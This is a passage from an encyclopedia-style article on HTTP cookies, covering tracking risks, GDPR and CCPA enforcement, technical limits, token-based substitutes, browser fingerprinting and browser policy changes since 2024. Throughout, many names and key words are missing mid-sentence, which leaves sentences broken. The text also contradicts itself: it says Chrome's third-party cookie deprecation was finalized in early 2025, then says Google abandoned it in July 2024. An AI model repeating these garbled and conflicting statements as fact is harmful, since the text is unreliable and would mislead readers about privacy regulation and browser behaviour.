cookie-based targeting, enabling precise audience segmentation but raising causal concerns over opaque without granular . Despite browser restrictions and regulatory pressures like GDPR, which reduced third-party cookie creation by 22% on news sites post-2018, their deployment persists on over 40% of active websites, sustaining profiling capabilities amid evolving mitigations.

Empirical Evidence on Risks vs. Perceived Harms

While HTTP cookies facilitate user tracking across sessions, empirical analyses reveal that direct harms, such as financial loss or , predominantly stem from theft or hijacking rather than standard tracking mechanisms. A 2015 study examined cookie integrity flaws, demonstrating successful real-world exploits that resulted in privacy violations, online victimization, account hijacking, and financial losses for affected users, often exploiting vulnerabilities like or insecure transmission without proper flags. These incidents underscore causal risks from inadequate implementation, where stolen session cookies enable unauthorized access, but such attacks require additional vectors like or network interception, limiting their baseline prevalence without user compromise. In contrast, routine third-party cookie-based profiling for advertising yields minimal documented tangible harms, with no large-scale studies linking it directly to widespread or economic damage; instead, data indicates over 93.7 billion stolen cookies circulate on markets as of 2025, primarily harvested via or breaches rather than inherent cookie flaws. Perceived risks, amplified by regulatory hype and media narratives, often outpace actual impacts, as evidenced by the privacy paradox: users report high concerns over and via cookies, yet fail to alter behaviors like rejecting trackers, with surveys showing only marginal shifts post-GDPR implementation in 2018. For instance, cookie disclaimers intended to heighten did not significantly elevate user rejection rates or privacy-protective actions, suggesting overestimation of harms like manipulative targeting, which empirical models attribute more to broader data ecosystems than cookies alone. Quantitative assessments further highlight discrepancies, with economic analyses focusing on publisher losses from cookie restrictions (e.g., reduced ad revenues estimated at billions annually) rather than user-side harms, implying that perceived privacy erosion drives policy more than verified causal damage. While risks persist in unsecured contexts—such as non-HTTPS sites enabling cookie sniffing—mitigations like Secure and HttpOnly attributes have curtailed vulnerabilities since their widespread adoption post-2010, reducing empirical incidence rates compared to early web eras; however, source biases in academia toward amplifying surveillance narratives may inflate perceptions without proportional evidence of population-level harms.

Regulatory Frameworks and Their Impacts

The , adopted in 2002 and often termed the "cookie law," mandates that websites obtain users' prior before storing or accessing non-essential cookies on devices within the , with exemptions for strictly necessary cookies essential for service provision. This framework operates alongside the General Data Protection Regulation (GDPR), effective May 25, 2018, which classifies cookies as when they enable user identification or profiling, subjecting their processing to GDPR's consent, transparency, and data minimization requirements. In the United States, the (CCPA), enacted in 2018 and operative from January 1, 2020, does not impose blanket cookie consent but requires businesses to provide notices about via cookies and enable rights for the "sale" or sharing of personal information for behavioral advertising, with amendments under the (CPRA) expanding to sharing for cross-context targeting. Enforcement under these regimes has resulted in significant penalties for non-compliance, particularly in the where data protection authorities prioritize cookie consent violations. For instance, France's CNIL imposed fines totaling €210 million on (€150 million) and Meta (€60 million) in December 2022 for deploying cookies for personalized advertising without valid consent, citing inadequate transparency and pre-checked boxes as infringements. Similarly, CNIL fined €40 million in March 2019 for similar consent failures in tracking technologies, marking one of the earliest major cookie-related penalties post-GDPR. In the , CCPA enforcement has been lighter on cookies specifically, with the (FTC) pursuing cases under broader unfair practices; however, state attorneys general have issued notices, such as California's 2023 actions against companies for inadequate mechanisms in tracking cookies. These regulations have driven widespread adoption of cookie consent banners across EU websites, with a measurement study documenting a 16% increase in their prevalence among 6,579 sites following GDPR implementation, often featuring granular choices but plagued by patterns that nudge users toward acceptance. Economically, compliance burdens disproportionately affect smaller websites and startups, prompting some to geoblock EU visitors or invest in consent management platforms, while larger firms like Meta report minimal revenue impacts from reduced tracking. On privacy outcomes, empirical analyses reveal limited user behavior shifts: a 2020 study found no heightened attitudes post-GDPR, with users increasingly acquiescing to cookies as routine, viewing banners as annoyances rather than empowerment tools. Moreover, regulations have spurred evasion tactics, including server-side tracking and device fingerprinting, which evade cookie-specific rules but enable persistent profiling with potentially lower transparency, as evidenced by rising first-party methods post-consent mandates.

Limitations and Inefficacies

Identification Shortcomings

HTTP cookies suffer from inherent limitations in achieving persistent and unique user identification due to their dependence on client-side storage and user control. Users can manually delete cookies or employ browser features to clear them periodically, severing the link to prior session and requiring re-identification upon subsequent visits. Session cookies, which lack an explicit , are automatically removed when the browser closes, rendering them unsuitable for long-term tracking. Persistent cookies, while designed for longevity via expiration dates, remain vulnerable to user-initiated clearing or automated tools that purge stored . Cookies are confined to the specific browser and device where they are set, precluding native support for cross-device or cross-browser identification. This scoping arises from their implementation as domain-bound, browser-managed files, necessitating supplementary techniques like device fingerprinting or logged-in account stitching to approximate unified user profiles across platforms. Without such extensions, cookies fail to correlate activities from, for instance, a mobile Safari session to a desktop Chrome instance. Third-party cookies, critical for cross-site identification in and , have become increasingly unreliable amid browser restrictions and user opt-outs. Safari's Intelligent Tracking Prevention and Firefox's Tracking Protection block third-party cookies by default, while initiated phased deprecation in 2024, starting with 1% of users in the first quarter and expanding thereafter. Surveys reveal that 67% of adults disable cookies or tracking to safeguard , with global estimates reaching 72% usage of blocking tools by 2025. Technical constraints exacerbate these issues: browsers typically cap cookies at around 50 per domain and 4KB per cookie, limiting the embedding of complex or redundant identifiers to enhance uniqueness or resilience. Exceeding these thresholds results in dropped cookies or failed , further eroding identification reliability. These shortcomings collectively diminish cookies' efficacy as a standalone identification method, driving reliance on hybrid or cookie-independent approaches.

Technical Drawbacks (Size, Expiration Issues)

HTTP cookies face inherent size constraints that limit their capacity for and transmission efficiency. RFC 6265 mandates that user agents support cookies totaling at least 4096 bytes, including the name, value, and attributes such as path or domain. Exceeding this per-cookie limit prompts rejection in browsers like Chrome and , which enforce a hard cap around 4096-4097 bytes. Per-domain restrictions compound this, with legacy browsers such as capping at 50 cookies and modern ones like permitting up to 1000 or more, though total storage across domains rarely exceeds several thousand. These boundaries necessitate data fragmentation into multiple cookies, increasing header bloat in requests—cookies append to every domain-bound HTTP transmission—thereby elevating bandwidth usage and latency, particularly on mobile or low-speed connections. Server-side header limits, such as NGINX's default 4KB for entire headers, can further truncate oversized cookie payloads, disrupting state persistence and forcing reliance on less efficient alternatives like local storage. Empirical analyses reveal that bloated cookies correlate with measurable performance degradation, as request sizes swell without proportional utility gains, underscoring the mechanism's inefficiency for voluminous or complex . Expiration handling introduces additional technical unreliability, as it hinges on client-side enforcement without server oversight. Persistent cookies rely on the Expires header (UTC ) or Max-Age directive (seconds offset), but evaluation occurs locally, rendering outcomes vulnerable to user clock inaccuracies—common in misconfigured systems or deliberate tampering—which can prematurely invalidate valid cookies or prolong obsolete ones. Servers cannot query or mandate deletion post-set, leaving dependent on client compliance and exposing systems to stale data risks in or session contexts. Formatting errors exacerbate issues; non-UTC Expires values or absent attributes may cause browsers to default to session behavior, ignoring intended persistence and yielding unpredictable lifetimes across implementations like Chrome or . Short-term expirations prove challenging for precision, as granular controls (e.g., minutes) falter against browser defaults favoring coarser units, complicating scenarios like temporary access tokens. This client-centric model, while decentralized, undermines causal reliability in time-bound operations, often necessitating hybrid approaches with server-side validation to mitigate expiration-induced failures.

Alternatives and Evolutions

Session and Authentication Substitutes

Token-based authentication, particularly using JSON Web Tokens (JWTs), provides a stateless substitute for cookie-managed sessions by encoding user claims and expiration data in a compact, digitally signed structure that clients transmit in HTTP request headers, such as the header with a Bearer scheme. This approach eliminates the need for server-side session storage, reducing scalability burdens as each token can be independently verified using a or public key without querying a database. Introduced in RFC 7519 on May 8, 2015, JWTs support claims like issuer, audience, and subject, enabling secure propagation across services. However, tokens must be stored client-side (e.g., in memory or localStorage), exposing them to extraction via (XSS) if not handled carefully, unlike HttpOnly cookies which restrict access. For browser-based applications seeking cookie-less sessions, localStorage and sessionStorage offer key-value persistence without automatic server transmission, suitable for single-page applications (SPAs) where manually retrieves and attaches identifiers to requests. LocalStorage endures across browser sessions until explicitly cleared, with a typical quota of 5-10 MB per origin depending on the browser (e.g., Chrome limits to about 10 MB as of 2024), while sessionStorage clears on tab closure. These mechanisms support session revival post-refresh but falter in multi-tab scenarios or incognito mode, and their accessibility to renders them vulnerable to XSS, prompting recommendations for short-lived tokens combined with refresh mechanisms. Empirical analyses indicate localStorage suits non-sensitive state but underperforms cookies for security-critical authentication due to lacking built-in attributes like Secure or SameSite. URL rewriting appends session identifiers directly to s (e.g., ?sessionId=abc123), enabling stateless tracking without cookies or storage APIs, a method dating to early HTTP/1.0 specifications but largely deprecated for exposing IDs in browser history, referer headers, and server logs. This technique risks attacks if IDs leak via email or social shares, and it burdens clients with manual URL management in non-GET requests. Hidden form fields embed identifiers in forms for POST-based state transfer, effective for sequential interactions but ineffective for direct navigation or AJAX calls, limiting applicability to legacy form-heavy sites. OAuth 2.0 access tokens function as short-lived substitutes for persistent cookie authentication, granting scoped access without embedding credentials, often paired with JWTs for self-contained verification in ecosystems. Standardized in RFC 6749 on October 24, 2012, these bearer tokens demand secure transmission (e.g., over ) and revocation lists for invalidation, trading cookie convenience for finer-grained control in federated systems. Security evaluations highlight that while cookie-less tokens evade (CSRF) by requiring explicit header inclusion, they amplify XSS risks and complicate logout, as tokens persist until expiry without centralized invalidation. Web Workers offer an isolated storage alternative for ephemeral secrets, bypassing main-thread access and thus mitigating some XSS vectors, though limited to non-persistent data across page reloads. Overall, these substitutes prioritize and mobile compatibility over traditional web ergonomics, with adoption surging post-2020 amid third-party cookie deprecations, yet analyses underscore hybrid cookie-token models for optimal browser security.

Tracking Innovations Beyond Cookies

Browser fingerprinting emerged as a prominent alternative to HTTP cookies for cross-site user tracking, particularly following browser vendors' restrictions on third-party cookies starting in 2020 and accelerating through 2024. This technique compiles a constellation of device and browser attributes—such as strings, screen resolution, installed fonts, , hardware concurrency, and capabilities—into a hashed identifier without requiring persistent storage on the client side. Unlike cookies, which can be deleted or blocked via browser settings, fingerprinting operates passively through or HTTP requests, making it resilient to common tools like cookie clearing. Canvas fingerprinting, a subset of browser fingerprinting, renders invisible graphics on an HTML5 canvas element and analyzes the resulting pixel data for variations caused by graphics drivers and hardware, yielding high uniqueness even among similar devices. Studies indicate that canvas-based hashes distinguish over 99% of users in controlled tests, as minor rendering differences from GPU implementations create distinct signatures. Similarly, AudioContext fingerprinting exploits inconsistencies in audio processing APIs to generate audio signals, hashing the output waveform for identification; this method achieves uniqueness rates comparable to canvas techniques, with entropy values often exceeding 18 bits per user. Device fingerprinting extends these principles to mobile and cross-device scenarios by incorporating telemetry like , accelerometer data (where accessible), and OS version, enabling probabilistic matching across sessions without cookies. Commercial implementations, such as those from Fingerprint Identification, claim sub-0.5% false positive rates in visitor identification by combining over 100 signals into stable profiles that persist despite browser changes. Server-side tracking complements fingerprinting by logging events directly on ad servers via first-party pixels or APIs, bypassing client-side storage altogether and reducing exposure to ad blockers; this approach gained traction post-2020 with tools like 4's server-side tagging. Supercookies and evercookies represent hybrid innovations that repopulate deleted cookies using alternative storage mechanisms like HTTP ETags, LocalStorage, or IndexedDB, ensuring persistence across cookie purges. ETags, originally for caching, function as stateless identifiers by embedding unique tokens in server responses, which clients echo back unmodified, allowing reconstruction of session history without traditional cookie files. These methods collectively enable advertisers to maintain user profiles for retargeting, with fingerprinting's adoption surging after Safari's Intelligent Tracking Prevention in 2017 and Chrome's third-party cookie deprecation finalized in early 2025.

Recent Browser Policy Shifts (2024 Onward)

In July 2024, Google announced the termination of its multi-year initiative to deprecate third-party cookies in Chrome, reversing prior commitments to phase them out by late 2024 or early 2025. The decision followed regulatory scrutiny from bodies including the UK's Competition and Markets Authority, which raised concerns over potential anticompetitive effects of Google's Privacy Sandbox alternatives, and industry opposition citing disruptions to advertising ecosystems. Chrome now preserves user choice mechanisms, allowing individuals to enable or block third-party cookies via settings prompts, while introducing enhanced tracking protections in Incognito mode, such as IP blinding planned for Q3 2025. Mozilla advanced its anti-tracking measures in 2024 by expanding Total Cookie Protection to all users by default, which partitions and blocks third-party cookies associated with known trackers across sites. In December 2024, version 135 retired the legacy "" signal—deemed ineffective due to inconsistent adoption by websites—and integrated support for the Global Privacy Control (GPC) standard, enabling users to signal preferences for data sales and sharing. These updates build on 's Enhanced Tracking Protection, prioritizing empirical blocking of cross-site identifiers over voluntary signals. Microsoft Edge, leveraging Chromium foundations, initiated small-scale trials in mid-2024 to deprecate third-party cookies for under 1% of non-managed users, aiming to assess impacts on web functionality and . Unlike Chrome's full reversal, Edge's experiments align with broader Microsoft tools, including default blocking options under its tracking prevention settings, though no widespread rollout has occurred as of October 2025. Apple Safari maintained its longstanding Intelligent Tracking Prevention (ITP), which has blocked third-party by default since 2017, with no substantive policy alterations announced in 2024 or 2025; minor 17.4 adjustments in the addressed requirements for alternative browser engines but did not relax cookie restrictions. This continuity reflects Safari's emphasis on heuristic-based fingerprinting detection over cookie-specific toggles, sustaining high barriers to cross-site tracking irrespective of Google's pivot.

References

Add your contribution
Related Hubs
Contribute something
User Avatar
No comments yet.